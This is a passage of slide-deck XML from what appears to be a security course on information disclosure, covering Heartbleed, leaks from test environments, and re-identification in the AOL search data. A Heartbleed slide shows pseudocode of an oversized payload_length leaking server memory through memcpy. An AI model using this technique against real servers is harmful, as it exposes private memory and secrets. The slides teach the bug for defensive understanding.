              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Caused by not checking the length of a buffer before performing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>memcpy() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>in the OpenSSL library</a:t>
            </a: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sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1083" name="Google Shape;1083;p155" descr="Heartbleed Bug"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6800275" y="1288550"/>
            <a:ext cx="1900000" cy="2301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56"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="445025"/>
            <a:ext cx="8520600" cy="3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Heartbleed</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1089" name="Google Shape;1089;p156"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404800" y="1152475"/>
            <a:ext cx="8520600" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="254000" marR="254000" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>struct {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>	HeartbeatMessageType type;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>	uint16 payload_length;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>	opaque payload[];</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>	opaque padding[]; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>} HeartbeatMessage;</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="254000" marR="254000" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="254000" marR="254000" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>memcpy(destination, message-&gt;payload, message-&gt;payload_length);</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pP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57"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="445025"/>
            <a:ext cx="8520600" cy="3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Heartbleed</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1095" name="Google Shape;1095;p157"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404800" y="1152475"/>
            <a:ext cx="8520600" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="254000" marR="254000" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>struct {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>	HeartbeatMessageType type;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>uint16 payload_length = 65536;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>	opaque payload[] = “HELLO”;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>opaque padding[]; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>} HeartbeatMessage;</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="254000" marR="254000" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="254000" marR="254000" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>memcpy(destination, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>message-&gt;payload, message-&gt;payload_length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="6BBF4E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Copy the 5 bytes from payload, and then the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="6BBF4E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>next</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="6BBF4E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 65531 bytes of server memory</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="6BBF4E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="45720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sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1096" name="Google Shape;1096;p157"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6273550" y="3139550"/>
            <a:ext cx="1026000" cy="47130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Information Leakage from Test Environments</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1102" name="Google Shape;1102;p158"/>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b="1"/>
              <a:t>Dev/Test/QA environments are often sources of information leaks</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>In 2016, the American College of Cardiology announced the disclosure of patient data from 1,400 institutions via the National Cardiovascular Data Registry. Test environments setup for external vendors contained unmasked production data </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A 2015 survey found that 80% of respondents stored production data in development environments</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Pre-production environments usually don’t have the strongest controls</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Self-signed SSL certs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Lax permissions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Weaker passwords</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Less logging and monitoring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Information Disclosure from Data Sets</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1108" name="Google Shape;1108;p159"/>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In 2006, AOL released 20-million search engine records, across 650,000 of their users, to the public to support academic research purposes</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>They anonymized the screen names of the users:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> johndoe -&gt; 4417749</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>They didn’t filter the search results: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>People often search for themselves</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Researchers were able to identify specific individuals, either based on searching their name directly, or through metadata about their location</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Date of Birth, Gender, and Zip Code identifies 87% of the population</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="45720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sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pP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60"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404800" y="1152475"/>
            <a:ext cx="8520600" cy="35013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b="1"/>
              <a:t>Ensure sure production builds disable full error responses</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
